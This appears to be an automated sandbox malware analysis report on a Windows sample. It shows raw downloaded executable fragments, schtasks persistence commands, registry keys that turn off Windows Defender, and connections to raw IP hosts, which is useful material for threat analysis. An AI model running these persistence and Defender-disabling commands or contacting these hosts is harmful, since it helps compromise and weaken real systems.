0x00cc000c	1	1
InternetReadFile Nov. 4, 2021, 2:44 p.m.	buffer: rSÑ<¡ö?ÀÐ:Gö?hhö?g6qö?ù"Qjìaö?£J;ORö?d!YÈBö?ÞÀ¸V3ö?@bwú#ö?®1h³ö?X`ö?ü-)4döõ?çÐ¸[çõ?¥âìÃgØõ?W+Éõ?úGÆ¼ºõ?ÀZk¬õ?ªÌ#ñaõ?íX0Òõ?`XVõ?:kP<íqõ?âR\|ºcõ?UUUUUUõ?þ»æ%Gõ?ëôH 9õ?K¨Vÿõ?øâêõ?ÅÄá"õ?PPõ?LÝbóô?9/§àåô?L,Ü¾CØô?n¯%¸Êô?á¦Ý>½ô?[¿R Ö¯ô?Jv¢ô?gÐ²ã9ô?H"ô?{®Gázô?f`Y4Îmô?ÏõÇË`ô?ÊvÇâÙSô?ûÙbeøFô?Mî«0':ô?Õ%f-ô?QY^&µ ô?ô?feÑô?û°?ûó?¯¥Bîó?©ä¼,âó?ÆuªÙÕó?ç«{¤Éó?U)#Ù`½ó?;±;±ó?"Èz8$¥ó?c,ó?fÓ"ó?88ó?îEÉÑ[uó?HÞóió?ø_Î]ó?Áx+ûRó?Fà¬yFó?²¼W[ä:ó?újí\/ó?¿+Jã#ó?¶ëéXwó?Ñ0 ó?`ÄÈó?h/¡½öò?KÑþ¡Nëò?KÀ%àò? P- Õò? ,MûÉò?7Zù¾ò?@+´ò?Áó©ò?ä)Aò?¥¸[rò?°°ò?MÎ¡8ú}ò?5'¸Psò?'Ö\|³hò?ñp"^ò?²w~Sò?$I$Iò?[`·>ò?ß¼xV4ò? "*ò?xû!·ò?æUHyò?ÙÀgGò? ò?pÁ}÷ñ?L¸<ôìñ?t¸?;ïâñ?½J.gõØñ?¢Ïñ?Yàü"Åñ?)íF@J»ñ?ãºòg\|±ñ?{a¹§ñ?àñ?¢Sñ?Û+°ñ?ñ?Öwñ?ysBnñ?2üPdñ? 'u_[ñ?ÉÕý£¹Qñ?;Í _Hñ?$G4?ñ?È5È5ñ?¬Àí,ñ?30]çX#ñ?&H§0ñ?ñ?¾ûñ?ðþðþð?¢%³úíõð?ækõìð?`Uäð?F¨ Ûð?:5VDÒð?;Ú¼OqÉð?qA§Àð?È%ìæ·ð?µì.r/¯ð?§h ¦ð?`¯¦Ûð?T 9?ð?âeu³«ð?B!ð?âê¸){ð?Æ÷G &sð?ûyµjð?ü©ñÒMbð?ur îYð?4×÷Qð?ÅdÌIIð?AAð?üG·Æ8ð?^µ0ð?é)wüd(ð?@ ð?7zQ6$ð?ð?ð?ð?log10ÿÿÿÿÿÿ?Cÿÿÿÿÿÿ?ÃUnknown exceptionbad array new lengthabcdefghijklmnopqrstuvwxyz0123456789_ABCDEFGHIJKLMNOPQRSTUVWXYZpidhtmpfile.tmp.dllpidHTSIGwbTaskmgr.exekernel32.dll%uLoadLibraryAvector too longstring too longMZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $ÞévMÞévMÞévMÊrLÕévMÊuLØévMÊsLGévMÕrLÐévMÕuL×évMÕsLýévMÊwLÝévMÞéwM¼évMLßévMMßévMtLßévMRichÞévMPEd Ì<að" ¶øTZ`¬z(àà°ÜðX8ÐX0Ð.textÅµ¶ ` request_handle: 0x00cc000c	1	1
InternetReadFile Nov. 4, 2021, 2:44 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $AÍå¬h¶¬h¶¬h¶Çl·¬h¶Çk· ¬h¶Çm·½¬h¶½Ým·"¬h¶½Ýk·¬h¶WÙl·¬h¶WÙk·¬h¶WÙm·_¬h¶Çi·¬h¶¬i¶×¬h¶°Ùa· ¬h¶°Ù¶¬h¶°Ùj·¬h¶Rich¬h¶PEdUnoað"P>t.@`LëxÀ8ð¼Ðì @_pa(°_8`0.text@NP `.rdata`T@@.dataDîºò@À.pdata¼ð¾¬@@_RDATAô°j@@.rsrc8Àl@@.relocì Ð"p@BHì(èb H àGHÄ(éÌÌÌHì(H ¨è0ï H mIHÄ(éìH ÅIéàH ]IéÔH &ªéÄ÷ Hì(H ªèìî H ÑIHÄ(é¨Hì(A¹HoªE3ÀH õ©è÷ H IHÄ(éxHì(¹èöfHÐH 8ªèCö H ÔIHÄ(éKÌÌÌHì(H «èlî H ýIHÄ(é(H IéÌÌÌÌ·qH âIf£ï¶nqïéñÌÌÌÌÌÌÌÌÌH )JéÜÌÌÌÌH JéÌÌÌÌÌHì(=ÆÄuèÎ«Æ¸ÄfooHðE3ÀHæÄH çÄóçÄAPèf3ÉHåÄ çÄHÇHÑÄHHH .JHÄ(éMÌÌÌÌÌHì(=FÄuèN«Æ8ÄfoïHpE3ÀHÄH ÄóÄAPèæ¬3ÉHÄ ÄHÇHÄHHH îIHÄ(éÍÌÌÌÌÌHì(=ÆÃuèÎªÆ¸ÃfooHðE3ÀH¶ÃH ·Ãó·ÃAPèf¬3ÉHµÃ ·ÃHH¥ÃHHH ²IHÄ(éQÌÌÌÌÌÌÌÌÌé[ªÌÌÌÌÌÌÌÌÌÌÌHì(E3ÀH 2îAPèy`H=1îH2îv*HÇH "îLîHÁIètIÁà3Òè¾ H wIHÄ(éÖÌÌÌÌÌÌÌÌÌÌÌÌÌÌHì(E3ÀH ¢í3Òè`H IH¥íHÄ(éÌÌÌÌHì(H ½íèàÇH ÐíèÓÇÆäíH IHÄ(édÌÌÌÌÌÌÌÌÌÌÌÌHì(H ÍíèH ðíèsÆîH ÅIHÄ(é request_handle: 0x00cc0024	1	1
InternetReadFile Nov. 4, 2021, 2:44 p.m.	buffer: MZÿÿ¸@èº´ Í!¸LÍ!This program cannot be run in DOS mode. $uÀ)1¡GV1¡GV1¡GVg:V%¡GVg*Vh¡GVò®V0¡GVg)V¡GVò®V6¡GV1¡FVR¡GVg5V0¡GVg?V0¡GVRich1¡GVPELlö\|aàÀ`%Ð@@'õP0° request_handle: 0x00cc0034	1	1
InternetReadFile Nov. 4, 2021, 2:44 p.m.	buffer: MZÿÿ¸@èº´ Í!¸LÍ!This program cannot be run in DOS mode. $PELSY»^à \T p@Ð²äÜªd`iÀq@@pl.text [\ `.rdata CpD`@@.dataÄÀ¤@À.lileziwrP¼@@.rsrci`jÀ@@ÁàÃ3D$Â3D$Â®6ïÆÃÃUìì(¡ÓAeüEä¡ÓAV3W{EÜEüÇEà¹y7èÃÿÿÿEür=lBÈu.h<AØóÿÿPÿ`pA3ÀPPPÿXpAjjØûÿÿPÿ\pA¡ÓAEè¡ÓAEØÇEì ÇEôEôÆMøèCÿÿÿEølBEèú©u ÇhB@.ëíúëu%TèAMüÎQÇdB.ÎPèÿÿÿMôEøÆÓèEØ3Eø+øúujÿ4pA%»RÀ]ÇMøèÓþÿÿMÜÇÁèEðEðèÝþÿÿEüÇPEøEäè¾þÿÿEøPEðMøè¦þÿÿ%PèA+uøEà)EüÿMì/ÿÿÿ{_3^ÉÃUì¡lB døAìVÁè3ö;ÆvbSWÙø=lBé uCÿpAVEüPVüûÿÿPVÿ0pAVü÷ÿÿPVÿTpAVVÿ@pAVVhHAhAÿDpAè&þÿÿÃOu¦_[^ÉÃUìQ\>B3ÉV5døA9 lBvUü¸;-EüEü1A; lBrã^ÉÃÿ5lBjÿPpA£døAÃ3ÀèAÈãA@ÉuïÃj@hÿ5lBjÿ<pA£døAÃUììSV3ö=lB W=hpAuVVÿdqAÿuüVÿ,pAVÿ$pAVVÿ×Vè¯Ç$) hêè^hÜAhàAèºVè>VVVèMÙîÄÝT$Ý$èËÄÝØÄ0pèúÝØVVèÄ3Ûÿ(pAûR }VVÿ×VVVVÿpAû5 Cûu^\|ÓèþþÿÿhÈãAÿLpAhøAP£`Bÿ8pA£\BèÄþÿÿèçþÿÿ¡ÜÓA£\>Bèuþÿÿ3ÿ95lBv)=lBDuVEüPVVVÿ0pAVVVÿ pAG;=lBr×3ÿ¡l*BÇø^u.VüûÿÿPVÿHpAVü÷ÿÿPVhAVVÿdpAVVVÿpAG request_handle: 0x00cc003c	1	1
InternetReadFile Nov. 4, 2021, 2:45 p.m.	buffer: MZPÿÿ¸@º´ Í!¸LÍ!This program must be run under Win32 $7PEL^BàÐø¥°@Ð@@ÐP (¿ðCODE0 `DATAP°¢@ÀBSSÀ¦À.idataP Ð ¦@À.tlsà°À.rdatað°@P.relocÄ@P.rsrc(¿À²@P@è@P string<@m@Ä)@¬(@Ô(@)@$)@Free0)@InitInstanceL)@CleanupInstanceh(@ ClassTypel(@ ClassName(@ClassNameIs¨(@ClassParentÀ)@ ClassInfoø(@InstanceSize°)@InheritsFromÈ)@Dispatchð)@ MethodAddress<@ MethodNamex*@FieldAddressÄ)@DefaultHandler¬(@NewInstanceÔ(@FreeInstanceTObject@Ã@ÿ% Ñ@Àÿ%Ñ@Àÿ%Ñ@Àÿ%Ñ@Àÿ%Ñ@Àÿ%Ñ@Àÿ%Ñ@Àÿ%(Ñ@Àÿ%Ñ@Àÿ%Ñ@Àÿ%üÐ@Àÿ%øÐ@Àÿ%ôÐ@Àÿ%ðÐ@Àÿ%ìÐ@Àÿ%èÐ@Àÿ%äÐ@Àÿ%àÐ@Àÿ%ÜÐ@Àÿ%ØÐ@Àÿ%ÔÐ@Àÿ%@Ñ@Àÿ%<Ñ@Àÿ%8Ñ@Àÿ%4Ñ@Àÿ%0Ñ@Àÿ%ÐÐ@Àÿ%ÌÐ@Àÿ%ÈÐ@Àÿ%ÄÐ@Àÿ%ÀÐ@Àÿ%¼Ð@Àÿ%¸Ð@Àÿ%´Ð@ÀSV¾8Ä@>u:hDjè¨ÿÿÿÈÉu3À^[Ã¡4Ä@ 4Ä@3ÒÂÀDÁBúduì^[Ã@ÃÀSVòØèÿÿÿÀu3À^[ÃPVPXB°^[ÃP Q8Ä@£8Ä@ÃSVWUQñ$è]$PV;CÐS;uÃè·ÿÿÿCCFëV;Âu ÃèÿÿÿCFß;ëuÂÖÅèUÿÿÿÀu3ÀZ]_^[Ã@SVWUÄøØû2C;ðrlÎJèk;Íw^;ðuBCB)C{uDÃè5ÿÿÿë; rÎø{;Ïu)së& J$+ù request_handle: 0x00cc000c	1	1
InternetReadFile Nov. 4, 2021, 2:45 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELMfuÕà"0"¼@ `@ @ @4@W`h¸ H.text " `.rsrch¸`º$@@.reloc Þ @Bp@H¼¤I8u@B9o0é1 $:;QÍ¶¶Ûë2þ°8Y$ñ·¥ÙÑmig :®Þp=q12\|ù®a¼NoÑ¢eÐû½éáÎßaH_ØTÄYaBµx<zÍ¿.%îÏ>«J ½;(IÿâT º IááøüXLÑzÖÈÐ<'dBÉVOÔ@Þ~FMÎ¶ôuÆùÇ»ÚÎiÓýB÷¡³üaéåÄË× î"iu2ãÂçhåùkµ>Xíëø [+¿è^Ê1ÔCòkÏ_¸\¸ì¤Os:äDÉówj5ÌÎÅ#e(+µ2ON»«b!NÓ?aÏ°gÒÑÑMÓv§Ä6µ_'/d6tÊ¼µ$¯æä´ee5öéJ®éwæâÇeáîôXèêTÉ¼jïí(Êîv·#}2Þt(Ä¨ëÈ[K(ITÍ-bÎ4£ÂA¤mõËÝ õÈ¨ZêgfÚ¦ªDøl@J]e>Þ)¾ûwD¥v]¡×Ýû¨4+7õ request_handle: 0x00cc000c	1	1

Expresses interest in specific running processes (4 events)

process	ww_testll_0211_single.exe
process	zz_8wjnwjcywe8dtxxwfai7o.exe
process	egqradmp6vvhibhfuato690f.exe
process	301ty1t7qg8_zdcv75dgjbhh.exe

Repeatedly searches for a not-found process, you may want to run a web browser during analysis (50 out of 1757 events)

Time & API	Arguments	Status	Return	Repeated
Process32NextW Nov. 4, 2021, 2:36 p.m.	snapshot_handle: 0x0000000000000028 process_name: eg吐眞 process_identifier: 2488		0	0
Process32NextW Nov. 4, 2021, 2:36 p.m.	snapshot_handle: 0x0000000000000028 process_name: eg吐眞 process_identifier: 2488		0	0
Process32NextW Nov. 4, 2021, 2:36 p.m.	snapshot_handle: 0x0000000000000028 process_name: eg吐眞 process_identifier: 2488		0	0
Process32NextW Nov. 4, 2021, 2:36 p.m.	snapshot_handle: 0x0000000000000028 process_name: eg吐眞 process_identifier: 2488		0	0
Process32NextW Nov. 4, 2021, 2:36 p.m.	snapshot_handle: 0x0000000000000028 process_name: eg吐眞 process_identifier: 2488		0	0
Process32NextW Nov. 4, 2021, 2:36 p.m.	snapshot_handle: 0x0000000000000028 process_name: eg吐眞 process_identifier: 2488		0	0
Process32NextW Nov. 4, 2021, 2:36 p.m.	snapshot_handle: 0x0000000000000028 process_name: eg吐眞 process_identifier: 2488		0	0
Process32NextW Nov. 4, 2021, 2:36 p.m.	snapshot_handle: 0x0000000000000028 process_name: eg吐眞 process_identifier: 2488		0	0
Process32NextW Nov. 4, 2021, 2:36 p.m.	snapshot_handle: 0x0000000000000028 process_name: eg吐眞 process_identifier: 2488		0	0
Process32NextW Nov. 4, 2021, 2:36 p.m.	snapshot_handle: 0x0000000000000028 process_name: eg吐眞 process_identifier: 2488		0	0
Process32NextW Nov. 4, 2021, 2:36 p.m.	snapshot_handle: 0x0000000000000028 process_name: eg吐眞 process_identifier: 2488		0	0
Process32NextW Nov. 4, 2021, 2:36 p.m.	snapshot_handle: 0x0000000000000028 process_name: eg吐眞 process_identifier: 2488		0	0
Process32NextW Nov. 4, 2021, 2:36 p.m.	snapshot_handle: 0x0000000000000028 process_name: eg吐眞 process_identifier: 2488		0	0
Process32NextW Nov. 4, 2021, 2:36 p.m.	snapshot_handle: 0x0000000000000028 process_name: eg吐眞 process_identifier: 2488		0	0
Process32NextW Nov. 4, 2021, 2:36 p.m.	snapshot_handle: 0x0000000000000028 process_name: eg吐眞 process_identifier: 2488		0	0
Process32NextW Nov. 4, 2021, 2:36 p.m.	snapshot_handle: 0x0000000000000028 process_name: eg吐眞 process_identifier: 2488		0	0
Process32NextW Nov. 4, 2021, 2:36 p.m.	snapshot_handle: 0x0000000000000028 process_name: eg吐眞 process_identifier: 2488		0	0
Process32NextW Nov. 4, 2021, 2:36 p.m.	snapshot_handle: 0x0000000000000028 process_name: eg吐眞 process_identifier: 2488		0	0
Process32NextW Nov. 4, 2021, 2:36 p.m.	snapshot_handle: 0x0000000000000028 process_name: eg吐眞 process_identifier: 2488		0	0
Process32NextW Nov. 4, 2021, 2:36 p.m.	snapshot_handle: 0x0000000000000028 process_name: eg吐眞 process_identifier: 2488		0	0
Process32NextW Nov. 4, 2021, 2:36 p.m.	snapshot_handle: 0x0000000000000028 process_name: eg吐眞 process_identifier: 2488		0	0
Process32NextW Nov. 4, 2021, 2:36 p.m.	snapshot_handle: 0x0000000000000028 process_name: eg吐眞 process_identifier: 2488		0	0
Process32NextW Nov. 4, 2021, 2:36 p.m.	snapshot_handle: 0x0000000000000028 process_name: eg吐眞 process_identifier: 2488		0	0
Process32NextW Nov. 4, 2021, 2:36 p.m.	snapshot_handle: 0x0000000000000028 process_name: eg吐眞 process_identifier: 2488		0	0
Process32NextW Nov. 4, 2021, 2:36 p.m.	snapshot_handle: 0x0000000000000028 process_name: eg吐眞 process_identifier: 2488		0	0
Process32NextW Nov. 4, 2021, 2:36 p.m.	snapshot_handle: 0x0000000000000028 process_name: eg吐眞 process_identifier: 2488		0	0
Process32NextW Nov. 4, 2021, 2:36 p.m.	snapshot_handle: 0x0000000000000028 process_name: eg吐眞 process_identifier: 2488		0	0
Process32NextW Nov. 4, 2021, 2:36 p.m.	snapshot_handle: 0x0000000000000028 process_name: eg吐眞 process_identifier: 2488		0	0
Process32NextW Nov. 4, 2021, 2:36 p.m.	snapshot_handle: 0x0000000000000028 process_name: eg吐眞 process_identifier: 2488		0	0
Process32NextW Nov. 4, 2021, 2:36 p.m.	snapshot_handle: 0x0000000000000028 process_name: eg吐眞 process_identifier: 2488		0	0
Process32NextW Nov. 4, 2021, 2:36 p.m.	snapshot_handle: 0x0000000000000028 process_name: eg吐眞 process_identifier: 2488		0	0
Process32NextW Nov. 4, 2021, 2:36 p.m.	snapshot_handle: 0x0000000000000028 process_name: eg吐眞 process_identifier: 2488		0	0
Process32NextW Nov. 4, 2021, 2:36 p.m.	snapshot_handle: 0x0000000000000028 process_name: eg吐眞 process_identifier: 2488		0	0
Process32NextW Nov. 4, 2021, 2:36 p.m.	snapshot_handle: 0x0000000000000028 process_name: eg吐眞 process_identifier: 2488		0	0
Process32NextW Nov. 4, 2021, 2:36 p.m.	snapshot_handle: 0x0000000000000028 process_name: eg吐眞 process_identifier: 2488		0	0
Process32NextW Nov. 4, 2021, 2:36 p.m.	snapshot_handle: 0x0000000000000028 process_name: eg吐眞 process_identifier: 2488		0	0
Process32NextW Nov. 4, 2021, 2:36 p.m.	snapshot_handle: 0x0000000000000028 process_name: eg吐眞 process_identifier: 2488		0	0
Process32NextW Nov. 4, 2021, 2:36 p.m.	snapshot_handle: 0x0000000000000028 process_name: eg吐眞 process_identifier: 2488		0	0
Process32NextW Nov. 4, 2021, 2:36 p.m.	snapshot_handle: 0x0000000000000028 process_name: eg吐眞 process_identifier: 2488		0	0
Process32NextW Nov. 4, 2021, 2:36 p.m.	snapshot_handle: 0x0000000000000028 process_name: eg吐眞 process_identifier: 2488		0	0
Process32NextW Nov. 4, 2021, 2:36 p.m.	snapshot_handle: 0x0000000000000028 process_name: eg吐眞 process_identifier: 2488		0	0
Process32NextW Nov. 4, 2021, 2:36 p.m.	snapshot_handle: 0x0000000000000028 process_name: eg吐眞 process_identifier: 2488		0	0
Process32NextW Nov. 4, 2021, 2:36 p.m.	snapshot_handle: 0x0000000000000028 process_name: eg吐眞 process_identifier: 2488		0	0
Process32NextW Nov. 4, 2021, 2:36 p.m.	snapshot_handle: 0x0000000000000028 process_name: eg吐眞 process_identifier: 2488		0	0
Process32NextW Nov. 4, 2021, 2:36 p.m.	snapshot_handle: 0x0000000000000028 process_name: eg吐眞 process_identifier: 2488		0	0
Process32NextW Nov. 4, 2021, 2:36 p.m.	snapshot_handle: 0x0000000000000028 process_name: eg吐眞 process_identifier: 2488		0	0
Process32NextW Nov. 4, 2021, 2:36 p.m.	snapshot_handle: 0x0000000000000028 process_name: eg吐眞 process_identifier: 2488		0	0
Process32NextW Nov. 4, 2021, 2:36 p.m.	snapshot_handle: 0x0000000000000028 process_name: eg吐眞 process_identifier: 2488		0	0
Process32NextW Nov. 4, 2021, 2:36 p.m.	snapshot_handle: 0x0000000000000028 process_name: eg吐眞 process_identifier: 2488		0	0
Process32NextW Nov. 4, 2021, 2:36 p.m.	snapshot_handle: 0x0000000000000028 process_name: eg吐眞 process_identifier: 2488		0	0

Uses Windows utilities for basic Windows functionality (2 events)

cmdline	schtasks /create /f /RU "test22" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST

Communicates with host for which no DNS query was performed (3 events)

host	212.192.241.62
host	45.133.1.107
host	45.133.1.182

Installs itself for autorun at Windows startup (2 events)

cmdline	schtasks /create /f /RU "test22" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST

Network activity contains more than one unique useragent (3 events)

process	ww_testLL_0211_single.exe	useragent	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
process	ww_testLL_0211_single.exe	useragent	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
process	82YG_xkSvDww7zcrD21MLhC8.tmp	useragent	InnoDownloadPlugin/1.5

Uses Sysinternals tools in order to add additional command line functionality (2 events)

cmdline	schtasks /create /f /RU "test22" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST

Disables Windows Security features (8 events)

description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableRoutinelyTakingAction
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection

Connects to IP addresses that are no longer responding to requests (legitimate services will remain up-and-running usually) (3 events)

dead_host	192.168.56.103:49268
dead_host	192.168.56.103:49290
dead_host	192.168.56.103:49227

ww_testLL_0211_single.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All